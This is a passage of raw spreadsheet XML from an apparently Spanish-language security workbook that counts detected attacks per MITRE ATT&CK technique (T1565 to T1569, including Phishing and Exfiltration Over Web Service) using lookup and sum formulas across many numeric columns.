      <c r="AB57" s="392">
        <v>6</v>
      </c>
      <c r="AC57" s="16">
        <v>1</v>
      </c>
      <c r="AD57" s="394">
        <v>2</v>
      </c>
      <c r="AE57" s="392">
        <v>1</v>
      </c>
      <c r="AF57" s="392">
        <v>1</v>
      </c>
      <c r="AG57" s="322" t="str">
        <f t="shared" si="4"/>
        <v>1 (1)</v>
      </c>
      <c r="AH57" s="392">
        <v>1</v>
      </c>
      <c r="AI57" s="16">
        <v>1</v>
      </c>
      <c r="AJ57" s="394">
        <v>1</v>
      </c>
      <c r="AK57" s="392">
        <v>7</v>
      </c>
      <c r="AL57" s="392">
        <v>7</v>
      </c>
      <c r="AM57" s="322" t="str">
        <f t="shared" si="5"/>
        <v>7 (7)</v>
      </c>
      <c r="AN57" s="392">
        <v>7</v>
      </c>
      <c r="AO57" s="16">
        <v>1</v>
      </c>
      <c r="AP57" s="394">
        <v>3</v>
      </c>
      <c r="AQ57" s="292">
        <v>0</v>
      </c>
      <c r="AR57" s="322">
        <v>0</v>
      </c>
      <c r="AS57" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT57" s="12">
        <v>0</v>
      </c>
      <c r="AU57" s="13">
        <v>0</v>
      </c>
      <c r="AV57" s="394">
        <v>0</v>
      </c>
      <c r="AW57" s="392">
        <v>0</v>
      </c>
      <c r="AX57" s="392">
        <v>0</v>
      </c>
      <c r="AY57" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ57" s="4">
        <v>0</v>
      </c>
      <c r="BA57" s="16">
        <v>0</v>
      </c>
      <c r="BB57" s="394">
        <v>0</v>
      </c>
      <c r="BC57" s="292">
        <v>0</v>
      </c>
      <c r="BD57" s="322">
        <v>0</v>
      </c>
      <c r="BE57" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF57" s="12">
        <v>0</v>
      </c>
      <c r="BG57" s="13">
        <v>0</v>
      </c>
      <c r="BH57" s="394">
        <v>0</v>
      </c>
      <c r="BI57" s="292">
        <v>16</v>
      </c>
      <c r="BJ57" s="322">
        <v>16</v>
      </c>
      <c r="BK57" s="322" t="str">
        <f t="shared" si="9"/>
        <v>16 (16)</v>
      </c>
      <c r="BL57" s="12">
        <v>1</v>
      </c>
      <c r="BM57" s="13">
        <v>1</v>
      </c>
      <c r="BN57" s="394">
        <v>16</v>
      </c>
      <c r="BO57" s="292">
        <v>107</v>
      </c>
      <c r="BP57" s="322">
        <v>106</v>
      </c>
      <c r="BQ57" s="322" t="str">
        <f t="shared" si="10"/>
        <v>106 (107)</v>
      </c>
      <c r="BR57" s="12">
        <v>1</v>
      </c>
      <c r="BS57" s="12">
        <v>12</v>
      </c>
      <c r="BT57" s="13">
        <v>1</v>
      </c>
      <c r="BU57" s="394">
        <v>89</v>
      </c>
      <c r="BV57" s="292">
        <v>0</v>
      </c>
      <c r="BW57" s="322">
        <v>0</v>
      </c>
      <c r="BX57" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY57" s="12">
        <v>0</v>
      </c>
      <c r="BZ57" s="13">
        <v>0</v>
      </c>
      <c r="CA57" s="394">
        <v>0</v>
      </c>
      <c r="CB57" s="292">
        <v>4</v>
      </c>
      <c r="CC57" s="322">
        <v>4</v>
      </c>
      <c r="CD57" s="322" t="str">
        <f t="shared" si="12"/>
        <v>4 (4)</v>
      </c>
      <c r="CE57" s="12">
        <v>0</v>
      </c>
      <c r="CF57" s="12">
        <v>1</v>
      </c>
      <c r="CG57" s="13">
        <v>1</v>
      </c>
      <c r="CH57" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="58" spans="1:86" ht="15" customHeight="1">
      <c r="A58" s="4">
        <f t="shared" si="13"/>
        <v>56</v>
      </c>
      <c r="B58" s="4" t="str">
        <f>IFERROR(VLOOKUP(A58,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1565</v>
      </c>
      <c r="C58" s="493" t="str">
        <f>IFERROR(VLOOKUP(B58,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Manipulation</v>
      </c>
      <c r="D58" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B58)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E58" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B58,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F58" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G58" s="292">
        <v>0</v>
      </c>
      <c r="H58" s="322">
        <v>0</v>
      </c>
      <c r="I58" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J58" s="12">
        <v>0</v>
      </c>
      <c r="K58" s="13">
        <v>0</v>
      </c>
      <c r="L58" s="394">
        <v>0</v>
      </c>
      <c r="M58" s="322">
        <v>0</v>
      </c>
      <c r="N58" s="322">
        <v>0</v>
      </c>
      <c r="O58" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P58" s="12">
        <v>0</v>
      </c>
      <c r="Q58" s="13">
        <v>0</v>
      </c>
      <c r="R58" s="394">
        <v>0</v>
      </c>
      <c r="S58" s="409">
        <v>0</v>
      </c>
      <c r="T58" s="4">
        <v>0</v>
      </c>
      <c r="U58" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V58" s="4">
        <v>0</v>
      </c>
      <c r="W58" s="13">
        <v>0</v>
      </c>
      <c r="X58" s="394">
        <v>0</v>
      </c>
      <c r="Y58" s="392">
        <v>1</v>
      </c>
      <c r="Z58" s="392">
        <v>1</v>
      </c>
      <c r="AA58" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (1)</v>
      </c>
      <c r="AB58" s="392">
        <v>1</v>
      </c>
      <c r="AC58" s="16">
        <v>1</v>
      </c>
      <c r="AD58" s="394">
        <v>1</v>
      </c>
      <c r="AE58" s="392">
        <v>0</v>
      </c>
      <c r="AF58" s="392">
        <v>0</v>
      </c>
      <c r="AG58" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH58" s="392">
        <v>0</v>
      </c>
      <c r="AI58" s="16">
        <v>0</v>
      </c>
      <c r="AJ58" s="394">
        <v>0</v>
      </c>
      <c r="AK58" s="392">
        <v>1</v>
      </c>
      <c r="AL58" s="392">
        <v>1</v>
      </c>
      <c r="AM58" s="322" t="str">
        <f t="shared" si="5"/>
        <v>1 (1)</v>
      </c>
      <c r="AN58" s="392">
        <v>1</v>
      </c>
      <c r="AO58" s="16">
        <v>1</v>
      </c>
      <c r="AP58" s="394">
        <v>1</v>
      </c>
      <c r="AQ58" s="292">
        <v>0</v>
      </c>
      <c r="AR58" s="322">
        <v>0</v>
      </c>
      <c r="AS58" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT58" s="12">
        <v>0</v>
      </c>
      <c r="AU58" s="13">
        <v>0</v>
      </c>
      <c r="AV58" s="394">
        <v>0</v>
      </c>
      <c r="AW58" s="392">
        <v>0</v>
      </c>
      <c r="AX58" s="392">
        <v>0</v>
      </c>
      <c r="AY58" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ58" s="4">
        <v>0</v>
      </c>
      <c r="BA58" s="16">
        <v>0</v>
      </c>
      <c r="BB58" s="394">
        <v>0</v>
      </c>
      <c r="BC58" s="292">
        <v>0</v>
      </c>
      <c r="BD58" s="322">
        <v>0</v>
      </c>
      <c r="BE58" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF58" s="12">
        <v>0</v>
      </c>
      <c r="BG58" s="13">
        <v>0</v>
      </c>
      <c r="BH58" s="394">
        <v>0</v>
      </c>
      <c r="BI58" s="292">
        <v>0</v>
      </c>
      <c r="BJ58" s="322">
        <v>0</v>
      </c>
      <c r="BK58" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL58" s="12">
        <v>0</v>
      </c>
      <c r="BM58" s="13">
        <v>0</v>
      </c>
      <c r="BN58" s="394">
        <v>0</v>
      </c>
      <c r="BO58" s="292">
        <v>1</v>
      </c>
      <c r="BP58" s="322">
        <v>1</v>
      </c>
      <c r="BQ58" s="322" t="str">
        <f t="shared" si="10"/>
        <v>1 (1)</v>
      </c>
      <c r="BR58" s="12">
        <v>0</v>
      </c>
      <c r="BS58" s="12">
        <v>1</v>
      </c>
      <c r="BT58" s="13">
        <v>1</v>
      </c>
      <c r="BU58" s="394">
        <v>1</v>
      </c>
      <c r="BV58" s="292">
        <v>0</v>
      </c>
      <c r="BW58" s="322">
        <v>0</v>
      </c>
      <c r="BX58" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY58" s="12">
        <v>0</v>
      </c>
      <c r="BZ58" s="13">
        <v>0</v>
      </c>
      <c r="CA58" s="394">
        <v>0</v>
      </c>
      <c r="CB58" s="292">
        <v>0</v>
      </c>
      <c r="CC58" s="322">
        <v>0</v>
      </c>
      <c r="CD58" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE58" s="12">
        <v>0</v>
      </c>
      <c r="CF58" s="12">
        <v>0</v>
      </c>
      <c r="CG58" s="13">
        <v>0</v>
      </c>
      <c r="CH58" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:86" ht="15" customHeight="1">
      <c r="A59" s="4">
        <f t="shared" si="13"/>
        <v>57</v>
      </c>
      <c r="B59" s="4" t="str">
        <f>IFERROR(VLOOKUP(A59,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1566</v>
      </c>
      <c r="C59" s="493" t="str">
        <f>IFERROR(VLOOKUP(B59,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Phishing</v>
      </c>
      <c r="D59" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B59)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E59" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>172</v>
      </c>
      <c r="F59" s="579" t="str">
        <f t="shared" si="14"/>
        <v>2 (172)</v>
      </c>
      <c r="G59" s="292">
        <v>0</v>
      </c>
      <c r="H59" s="322">
        <v>0</v>
      </c>
      <c r="I59" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J59" s="12">
        <v>0</v>
      </c>
      <c r="K59" s="13">
        <v>0</v>
      </c>
      <c r="L59" s="394">
        <v>0</v>
      </c>
      <c r="M59" s="322">
        <v>2</v>
      </c>
      <c r="N59" s="322">
        <v>2</v>
      </c>
      <c r="O59" s="322" t="str">
        <f t="shared" si="1"/>
        <v>2 (2)</v>
      </c>
      <c r="P59" s="12">
        <v>2</v>
      </c>
      <c r="Q59" s="13">
        <v>0.5</v>
      </c>
      <c r="R59" s="394">
        <v>1</v>
      </c>
      <c r="S59" s="409">
        <v>2</v>
      </c>
      <c r="T59" s="4">
        <v>2</v>
      </c>
      <c r="U59" s="322" t="str">
        <f t="shared" si="2"/>
        <v>2 (2)</v>
      </c>
      <c r="V59" s="4">
        <v>2</v>
      </c>
      <c r="W59" s="13">
        <v>0.5</v>
      </c>
      <c r="X59" s="394">
        <v>1</v>
      </c>
      <c r="Y59" s="392">
        <v>9</v>
      </c>
      <c r="Z59" s="392">
        <v>8</v>
      </c>
      <c r="AA59" s="322" t="str">
        <f t="shared" si="3"/>
        <v>8 (9)</v>
      </c>
      <c r="AB59" s="392">
        <v>6</v>
      </c>
      <c r="AC59" s="16">
        <v>1</v>
      </c>
      <c r="AD59" s="394">
        <v>5</v>
      </c>
      <c r="AE59" s="392">
        <v>4</v>
      </c>
      <c r="AF59" s="392">
        <v>3</v>
      </c>
      <c r="AG59" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (4)</v>
      </c>
      <c r="AH59" s="392">
        <v>3</v>
      </c>
      <c r="AI59" s="16">
        <v>0.5</v>
      </c>
      <c r="AJ59" s="394">
        <v>1</v>
      </c>
      <c r="AK59" s="392">
        <v>13</v>
      </c>
      <c r="AL59" s="392">
        <v>11</v>
      </c>
      <c r="AM59" s="322" t="str">
        <f t="shared" si="5"/>
        <v>11 (13)</v>
      </c>
      <c r="AN59" s="392">
        <v>9</v>
      </c>
      <c r="AO59" s="16">
        <v>1</v>
      </c>
      <c r="AP59" s="394">
        <v>5</v>
      </c>
      <c r="AQ59" s="292">
        <v>0</v>
      </c>
      <c r="AR59" s="322">
        <v>0</v>
      </c>
      <c r="AS59" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT59" s="12">
        <v>0</v>
      </c>
      <c r="AU59" s="13">
        <v>0</v>
      </c>
      <c r="AV59" s="394">
        <v>0</v>
      </c>
      <c r="AW59" s="392">
        <v>0</v>
      </c>
      <c r="AX59" s="392">
        <v>0</v>
      </c>
      <c r="AY59" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ59" s="4">
        <v>0</v>
      </c>
      <c r="BA59" s="16">
        <v>0</v>
      </c>
      <c r="BB59" s="394">
        <v>0</v>
      </c>
      <c r="BC59" s="292">
        <v>2</v>
      </c>
      <c r="BD59" s="322">
        <v>2</v>
      </c>
      <c r="BE59" s="322" t="str">
        <f t="shared" si="8"/>
        <v>2 (2)</v>
      </c>
      <c r="BF59" s="12">
        <v>2</v>
      </c>
      <c r="BG59" s="13">
        <v>0.5</v>
      </c>
      <c r="BH59" s="394">
        <v>1</v>
      </c>
      <c r="BI59" s="292">
        <v>3</v>
      </c>
      <c r="BJ59" s="322">
        <v>2</v>
      </c>
      <c r="BK59" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL59" s="12">
        <v>2</v>
      </c>
      <c r="BM59" s="13">
        <v>0.5</v>
      </c>
      <c r="BN59" s="394">
        <v>1</v>
      </c>
      <c r="BO59" s="292">
        <v>169</v>
      </c>
      <c r="BP59" s="322">
        <v>168</v>
      </c>
      <c r="BQ59" s="322" t="str">
        <f t="shared" si="10"/>
        <v>168 (169)</v>
      </c>
      <c r="BR59" s="12">
        <v>2</v>
      </c>
      <c r="BS59" s="12">
        <v>4</v>
      </c>
      <c r="BT59" s="13">
        <v>1</v>
      </c>
      <c r="BU59" s="394">
        <v>167</v>
      </c>
      <c r="BV59" s="292">
        <v>2</v>
      </c>
      <c r="BW59" s="322">
        <v>2</v>
      </c>
      <c r="BX59" s="322" t="str">
        <f t="shared" si="11"/>
        <v>2 (2)</v>
      </c>
      <c r="BY59" s="12">
        <v>2</v>
      </c>
      <c r="BZ59" s="13">
        <v>1</v>
      </c>
      <c r="CA59" s="394">
        <v>2</v>
      </c>
      <c r="CB59" s="292">
        <v>0</v>
      </c>
      <c r="CC59" s="322">
        <v>0</v>
      </c>
      <c r="CD59" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE59" s="12">
        <v>0</v>
      </c>
      <c r="CF59" s="12">
        <v>0</v>
      </c>
      <c r="CG59" s="13">
        <v>0</v>
      </c>
      <c r="CH59" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="60" spans="1:86" ht="15" customHeight="1">
      <c r="A60" s="4">
        <f t="shared" si="13"/>
        <v>58</v>
      </c>
      <c r="B60" s="4" t="str">
        <f>IFERROR(VLOOKUP(A60,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1567</v>
      </c>
      <c r="C60" s="493" t="str">
        <f>IFERROR(VLOOKUP(B60,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over Web Service</v>
      </c>
      <c r="D60" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B60)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E60" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>26</v>
      </c>
      <c r="F60" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (26)</v>
      </c>
      <c r="G60" s="292">
        <v>0</v>
      </c>
      <c r="H60" s="322">
        <v>0</v>
      </c>
      <c r="I60" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J60" s="12">
        <v>0</v>
      </c>
      <c r="K60" s="13">
        <v>0</v>
      </c>
      <c r="L60" s="394">
        <v>0</v>
      </c>
      <c r="M60" s="322">
        <v>0</v>
      </c>
      <c r="N60" s="322">
        <v>0</v>
      </c>
      <c r="O60" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P60" s="12">
        <v>0</v>
      </c>
      <c r="Q60" s="13">
        <v>0</v>
      </c>
      <c r="R60" s="394">
        <v>0</v>
      </c>
      <c r="S60" s="409">
        <v>0</v>
      </c>
      <c r="T60" s="4">
        <v>0</v>
      </c>
      <c r="U60" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V60" s="4">
        <v>0</v>
      </c>
      <c r="W60" s="13">
        <v>0</v>
      </c>
      <c r="X60" s="394">
        <v>0</v>
      </c>
      <c r="Y60" s="392">
        <v>2</v>
      </c>
      <c r="Z60" s="392">
        <v>2</v>
      </c>
      <c r="AA60" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (2)</v>
      </c>
      <c r="AB60" s="392">
        <v>1</v>
      </c>
      <c r="AC60" s="16">
        <v>1</v>
      </c>
      <c r="AD60" s="394">
        <v>2</v>
      </c>
      <c r="AE60" s="392">
        <v>0</v>
      </c>
      <c r="AF60" s="392">
        <v>0</v>
      </c>
      <c r="AG60" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH60" s="392">
        <v>0</v>
      </c>
      <c r="AI60" s="16">
        <v>0</v>
      </c>
      <c r="AJ60" s="394">
        <v>0</v>
      </c>
      <c r="AK60" s="392">
        <v>2</v>
      </c>
      <c r="AL60" s="392">
        <v>2</v>
      </c>
      <c r="AM60" s="322" t="str">
        <f t="shared" si="5"/>
        <v>2 (2)</v>
      </c>
      <c r="AN60" s="392">
        <v>1</v>
      </c>
      <c r="AO60" s="16">
        <v>1</v>
      </c>
      <c r="AP60" s="394">
        <v>2</v>
      </c>
      <c r="AQ60" s="292">
        <v>0</v>
      </c>
      <c r="AR60" s="322">
        <v>0</v>
      </c>
      <c r="AS60" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT60" s="12">
        <v>0</v>
      </c>
      <c r="AU60" s="13">
        <v>0</v>
      </c>
      <c r="AV60" s="394">
        <v>0</v>
      </c>
      <c r="AW60" s="392">
        <v>0</v>
      </c>
      <c r="AX60" s="392">
        <v>0</v>
      </c>
      <c r="AY60" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ60" s="4">
        <v>0</v>
      </c>
      <c r="BA60" s="16">
        <v>0</v>
      </c>
      <c r="BB60" s="394">
        <v>0</v>
      </c>
      <c r="BC60" s="292">
        <v>0</v>
      </c>
      <c r="BD60" s="322">
        <v>0</v>
      </c>
      <c r="BE60" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF60" s="12">
        <v>0</v>
      </c>
      <c r="BG60" s="13">
        <v>0</v>
      </c>
      <c r="BH60" s="394">
        <v>0</v>
      </c>
      <c r="BI60" s="292">
        <v>0</v>
      </c>
      <c r="BJ60" s="322">
        <v>0</v>
      </c>
      <c r="BK60" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL60" s="12">
        <v>0</v>
      </c>
      <c r="BM60" s="13">
        <v>0</v>
      </c>
      <c r="BN60" s="394">
        <v>0</v>
      </c>
      <c r="BO60" s="292">
        <v>6</v>
      </c>
      <c r="BP60" s="322">
        <v>6</v>
      </c>
      <c r="BQ60" s="322" t="str">
        <f t="shared" si="10"/>
        <v>6 (6)</v>
      </c>
      <c r="BR60" s="12">
        <v>0</v>
      </c>
      <c r="BS60" s="12">
        <v>2</v>
      </c>
      <c r="BT60" s="13">
        <v>1</v>
      </c>
      <c r="BU60" s="394">
        <v>6</v>
      </c>
      <c r="BV60" s="292">
        <v>0</v>
      </c>
      <c r="BW60" s="322">
        <v>0</v>
      </c>
      <c r="BX60" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY60" s="12">
        <v>0</v>
      </c>
      <c r="BZ60" s="13">
        <v>0</v>
      </c>
      <c r="CA60" s="394">
        <v>0</v>
      </c>
      <c r="CB60" s="292">
        <v>0</v>
      </c>
      <c r="CC60" s="322">
        <v>0</v>
      </c>
      <c r="CD60" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE60" s="12">
        <v>0</v>
      </c>
      <c r="CF60" s="12">
        <v>0</v>
      </c>
      <c r="CG60" s="13">
        <v>0</v>
      </c>
      <c r="CH60" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:86" ht="15" customHeight="1">
      <c r="A61" s="4">
        <f t="shared" si="13"/>
        <v>59</v>
      </c>
      <c r="B61" s="4" t="str">
        <f>IFERROR(VLOOKUP(A61,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1568</v>
      </c>
      <c r="C61" s="493" t="str">
        <f>IFERROR(VLOOKUP(B61,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Dynamic Resolution</v>
      </c>
      <c r="D61" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B61)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E61" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>267</v>
      </c>
      <c r="F61" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (267)</v>
      </c>
      <c r="G61" s="292">
        <v>0</v>
      </c>
      <c r="H61" s="322">
        <v>0</v>
      </c>
      <c r="I61" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J61" s="12">
        <v>0</v>
      </c>
      <c r="K61" s="13">
        <v>0</v>
      </c>
      <c r="L61" s="394">
        <v>0</v>
      </c>
      <c r="M61" s="322">
        <v>0</v>
      </c>
      <c r="N61" s="322">
        <v>0</v>
      </c>
      <c r="O61" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P61" s="12">
        <v>0</v>
      </c>
      <c r="Q61" s="13">
        <v>0</v>
      </c>
      <c r="R61" s="394">
        <v>0</v>
      </c>
      <c r="S61" s="409">
        <v>0</v>
      </c>
      <c r="T61" s="4">
        <v>0</v>
      </c>
      <c r="U61" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V61" s="4">
        <v>0</v>
      </c>
      <c r="W61" s="13">
        <v>0</v>
      </c>
      <c r="X61" s="394">
        <v>0</v>
      </c>
      <c r="Y61" s="392">
        <v>246</v>
      </c>
      <c r="Z61" s="392">
        <v>246</v>
      </c>
      <c r="AA61" s="322" t="str">
        <f t="shared" si="3"/>
        <v>246 (246)</v>
      </c>
      <c r="AB61" s="392">
        <v>2</v>
      </c>
      <c r="AC61" s="16">
        <v>1</v>
      </c>
      <c r="AD61" s="394">
        <v>123</v>
      </c>
      <c r="AE61" s="392">
        <v>0</v>
      </c>
      <c r="AF61" s="392">
        <v>0</v>
      </c>
      <c r="AG61" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH61" s="392">
        <v>0</v>
      </c>
      <c r="AI61" s="16">
        <v>0</v>
      </c>
      <c r="AJ61" s="394">
        <v>0</v>
      </c>
      <c r="AK61" s="392">
        <v>246</v>
      </c>
      <c r="AL61" s="392">
        <v>246</v>
      </c>
      <c r="AM61" s="322" t="str">
        <f t="shared" si="5"/>
        <v>246 (246)</v>
      </c>
      <c r="AN61" s="392">
        <v>2</v>
      </c>
      <c r="AO61" s="16">
        <v>1</v>
      </c>
      <c r="AP61" s="394">
        <v>123</v>
      </c>
      <c r="AQ61" s="292">
        <v>0</v>
      </c>
      <c r="AR61" s="322">
        <v>0</v>
      </c>
      <c r="AS61" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT61" s="12">
        <v>0</v>
      </c>
      <c r="AU61" s="13">
        <v>0</v>
      </c>
      <c r="AV61" s="394">
        <v>0</v>
      </c>
      <c r="AW61" s="392">
        <v>0</v>
      </c>
      <c r="AX61" s="392">
        <v>0</v>
      </c>
      <c r="AY61" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ61" s="4">
        <v>0</v>
      </c>
      <c r="BA61" s="16">
        <v>0</v>
      </c>
      <c r="BB61" s="394">
        <v>0</v>
      </c>
      <c r="BC61" s="292">
        <v>0</v>
      </c>
      <c r="BD61" s="322">
        <v>0</v>
      </c>
      <c r="BE61" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF61" s="12">
        <v>0</v>
      </c>
      <c r="BG61" s="13">
        <v>0</v>
      </c>
      <c r="BH61" s="394">
        <v>0</v>
      </c>
      <c r="BI61" s="292">
        <v>0</v>
      </c>
      <c r="BJ61" s="322">
        <v>0</v>
      </c>
      <c r="BK61" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL61" s="12">
        <v>0</v>
      </c>
      <c r="BM61" s="13">
        <v>0</v>
      </c>
      <c r="BN61" s="394">
        <v>0</v>
      </c>
      <c r="BO61" s="292">
        <v>266</v>
      </c>
      <c r="BP61" s="322">
        <v>266</v>
      </c>
      <c r="BQ61" s="322" t="str">
        <f t="shared" si="10"/>
        <v>266 (266)</v>
      </c>
      <c r="BR61" s="12">
        <v>0</v>
      </c>
      <c r="BS61" s="12">
        <v>5</v>
      </c>
      <c r="BT61" s="13">
        <v>1</v>
      </c>
      <c r="BU61" s="394">
        <v>266</v>
      </c>
      <c r="BV61" s="292">
        <v>0</v>
      </c>
      <c r="BW61" s="322">
        <v>0</v>
      </c>
      <c r="BX61" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY61" s="12">
        <v>0</v>
      </c>
      <c r="BZ61" s="13">
        <v>0</v>
      </c>
      <c r="CA61" s="394">
        <v>0</v>
      </c>
      <c r="CB61" s="292">
        <v>20</v>
      </c>
      <c r="CC61" s="322">
        <v>20</v>
      </c>
      <c r="CD61" s="322" t="str">
        <f t="shared" si="12"/>
        <v>20 (20)</v>
      </c>
      <c r="CE61" s="12">
        <v>0</v>
      </c>
      <c r="CF61" s="12">
        <v>1</v>
      </c>
      <c r="CG61" s="13">
        <v>1</v>
      </c>
      <c r="CH61" s="394">
        <v>20</v>
      </c>
    </row>
    <row r="62" spans="1:86" ht="15" customHeight="1">
      <c r="A62" s="4">
        <f t="shared" si="13"/>
        <v>60</v>
      </c>
      <c r="B62" s="4" t="str">
        <f>IFERROR(VLOOKUP(A62,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1569</v>
      </c>
      <c r="C62" s="493" t="str">
        <f>IFERROR(VLOOKUP(B62,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>System Services</v>
      </c>
      <c r="D62" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B62)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E62" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>17</v>
      </c>
      <c r="F62" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (17)</v>
      </c>
      <c r="G62" s="292">
        <v>0</v>
      </c>
      <c r="H62" s="322">
        <v>0</v>
      </c>
      <c r="I62" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J62" s="12">
        <v>0</v>
      </c>
      <c r="K62" s="13">
        <v>0</v>
      </c>
      <c r="L62" s="394">
        <v>0</v>
      </c>
      <c r="M62" s="322">
        <v>1</v>
      </c>
      <c r="N62" s="322">
        <v>1</v>
      </c>
      <c r="O62" s="322" t="str">
        <f t="shared" si="1"/>
